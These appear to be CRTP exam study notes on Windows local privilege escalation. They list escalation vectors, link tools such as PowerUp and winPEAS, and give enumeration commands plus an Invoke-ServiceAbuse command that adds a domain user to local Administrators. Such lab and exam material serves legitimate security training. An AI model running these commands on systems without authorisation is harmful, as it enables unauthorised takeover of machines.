Local Privilege Escalation

The CRTP exam consists of 5 target servers in addition to a foothold student machine. The goal is to OS level command execution on all 5 targets not matter what the privileges of the user.

Vectors

There are various ways of locally escalating privileges on Windows box:

• Missing patches – Automated deployment and AutoLogon passwords in clear text

• AlwaysInstallElevated (Any user can run MSI as SYSTEM)

• Misconfigured Services – DLL Hijacking and more

• NTLM Relaying a.k.a. Won't Fix

This guide offer a sufficiently comprehensive overview of the course material for local privilege escalation

CRTP-Notes/2-Local-Priv-Esc/1-Local-PrivEsc.md at main · 0xStarlight/CRTP-NotesGitHub

Tools

PowerUp

PowerSploit/Privesc/PowerUp.ps1 at master · PowerShellMafia/PowerSploitGitHub

WinPEAS

PEASS-ng/winPEAS at master · peass-ng/PEASS-ngGitHub

Privesc

GitHub - enjoiz/Privesc: Windows batch script that finds misconfiguration issues which can lead to privilege escalation.GitHub

Automated checks

# PowerUp
Invoke-AllChecks

# winPEAS
winPEASx64.exe 

# Privesc
Invoke-PrivEsc

Services

PowerUp

Find vulnerable service configuration

# Get services with unquoted paths and spaces
Get-ServiceUnquoted -Verbose

# Get services where current user can write to binary path
Get-ModifiableServiceFile -Verbose

# Get the services whose configuration current user can modify
Get-ModifiableService -Verbose

Add domain user to the local Administrators group

Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'dcorp\studentx' -Verbose